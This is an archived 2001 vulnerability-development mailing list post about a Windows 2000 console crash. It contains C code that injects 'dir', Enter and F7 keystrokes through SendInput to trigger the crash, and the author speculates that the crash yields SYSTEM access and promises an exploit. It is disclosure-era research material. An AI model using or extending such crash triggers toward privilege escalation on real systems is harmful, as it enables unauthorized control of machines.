Vulnerability Development mailing list archives
RE: bug w2k
From: "Vladimir Kraljevic" <vladimir_kraljevic () llbudapest hu>
Date: Wed, 1 Aug 2001 10:11:52 +0200
It works with the simulated keystrokes as well... I was able to track it down up to the point where the subsystem crashes, but I have no more time to spend on it. I was able to get the access violation system box and delay the restart; everyone with a decent kernel debugger (SoftICE and the like) can trace the exact point of the crash. I'm pretty sure that you are getting the system account. If I'm right, we'll soon have a nice exploit, useful to anyone that has access to the CLI.

Enough for now, some work will follow, I have some ideas.

Vladimir

P.S. You can repeat the last two lines (SendInput(...)).

=============================================================CUT HERE
#define _WIN32_WINNT 0x0401
#include <windows.h>
#include <winuser.h>
#include <winnt.h>

int main(int argc, char *argv[])
{
    // Simulate "dir\n": one key-down and one key-up event per character,
    // plus the pair for Enter, so 8 INPUT records in total.
    INPUT inDirStrokes[8];
    memset(inDirStrokes, 0, sizeof(inDirStrokes));

    inDirStrokes[0].type = INPUT_KEYBOARD;
    inDirStrokes[0].ki.dwFlags = 0;
    inDirStrokes[0].ki.wVk = VkKeyScan('d');
    inDirStrokes[1].type = INPUT_KEYBOARD;
    inDirStrokes[1].ki.dwFlags = KEYEVENTF_KEYUP;
    inDirStrokes[1].ki.wVk = VkKeyScan('d');

    inDirStrokes[2].type = INPUT_KEYBOARD;
    inDirStrokes[2].ki.dwFlags = 0;
    inDirStrokes[2].ki.wVk = VkKeyScan('i');
    inDirStrokes[3].type = INPUT_KEYBOARD;
    inDirStrokes[3].ki.dwFlags = KEYEVENTF_KEYUP;
    inDirStrokes[3].ki.wVk = VkKeyScan('i');

    inDirStrokes[4].type = INPUT_KEYBOARD;
    inDirStrokes[4].ki.dwFlags = 0;
    inDirStrokes[4].ki.wVk = VkKeyScan('r');
    inDirStrokes[5].type = INPUT_KEYBOARD;
    inDirStrokes[5].ki.dwFlags = KEYEVENTF_KEYUP;
    inDirStrokes[5].ki.wVk = VkKeyScan('r');

    inDirStrokes[6].type = INPUT_KEYBOARD;
    inDirStrokes[6].ki.dwFlags = 0;
    inDirStrokes[6].ki.wVk = VK_RETURN;
    inDirStrokes[7].type = INPUT_KEYBOARD;
    inDirStrokes[7].ki.dwFlags = KEYEVENTF_KEYUP;
    inDirStrokes[7].ki.wVk = VK_RETURN;

    // Simulate "<F7>\n": F7 down/up followed by Enter down/up.
    INPUT inF7Strokes[4];
    memset(inF7Strokes, 0, sizeof(inF7Strokes));

    inF7Strokes[0].type = INPUT_KEYBOARD;
    inF7Strokes[0].ki.dwFlags = 0;
    inF7Strokes[0].ki.wVk = VK_F7;
    inF7Strokes[1].type = INPUT_KEYBOARD;
    inF7Strokes[1].ki.dwFlags = KEYEVENTF_KEYUP;
    inF7Strokes[1].ki.wVk = VK_F7;

    inF7Strokes[2].type = INPUT_KEYBOARD;
    inF7Strokes[2].ki.dwFlags = 0;
    inF7Strokes[2].ki.wVk = VK_RETURN;
    inF7Strokes[3].type = INPUT_KEYBOARD;
    inF7Strokes[3].ki.dwFlags = KEYEVENTF_KEYUP;
    inF7Strokes[3].ki.wVk = VK_RETURN;

    // Inject both sequences into the foreground window's input queue.
    SendInput(sizeof(inDirStrokes) / sizeof(inDirStrokes[0]), inDirStrokes, sizeof(INPUT));
    SendInput(sizeof(inF7Strokes) / sizeof(inF7Strokes[0]), inF7Strokes, sizeof(INPUT));

    return 0;
}
=============================================================CUT HERE
Current thread:
- RE: bug w2k Vladimir Kraljevic (Aug 01)